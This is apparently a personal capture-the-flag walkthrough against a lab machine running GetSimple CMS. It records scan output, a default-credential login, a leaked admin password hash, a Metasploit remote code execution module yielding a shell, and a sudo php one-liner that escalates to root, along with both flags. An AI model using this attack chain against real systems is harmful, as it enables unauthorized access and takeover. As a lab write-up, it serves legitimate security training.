Monty's Learning Notes | Obsidian

    Gettingstarted

    #default_credentials, #directory_traversal, #metasploit, #sudo_exploitation, #file_upload , #CVE
    NMAP result

    PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Whatweb result

    http://10.129.42.249:80 [200 OK] AddThis, Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.42.249], Script[text/javascript], Title[Welcome to GetSimple! - gettingstarted]

    GetSimple CMS
    Directory traversal

    /admin                (Status: 301) [Size: 314] [--> http://10.129.42.249/admin/]                                                                         
/backups              (Status: 301) [Size: 316] [--> http://10.129.42.249/backups/]                                                                       
/data                 (Status: 301) [Size: 313] [--> http://10.129.42.249/data/]                                                                          
/index.php            (Status: 200) [Size: 5485]
/plugins              (Status: 301) [Size: 316] [--> http://10.129.42.249/plugins/]                                                                       
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 278]
/sitemap.xml          (Status: 200) [Size: 431]
/theme                (Status: 301) [Size: 314] [--> http://10.129.42.249/theme/]

    Logged /admin in using default credentials: admin:admin
    There's an upload function
    There's a version information -> GetSimple Version|3.3.15|
    A quick search yielded a metasploit module for it
    found this in http://10.129.42.249/data/users/admin.xml

    <item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>

    This isn't any of the flags so I'm gonna leave this for now.
    I'm gonna use metasploit
    msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
    Got meterpreter shell

    pwd
/
cd home
ls
mrb3n
cd mrb3n
ls
user.txt
cat user.txt
7002d65b149b0a4d19132a66feed21d8

    Next, privilege escalation:

    sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

    Enter sudo /usr/bin/php -r 'system("/bin/bash");'

    sudo /usr/bin/php -r 'system("/bin/bash");'

whoami
root
pwd
/home/mrb3n
cd /root
ls
root.txt
snap
cat root.txt
f1fba6e9f71efb2630e6e34da6387842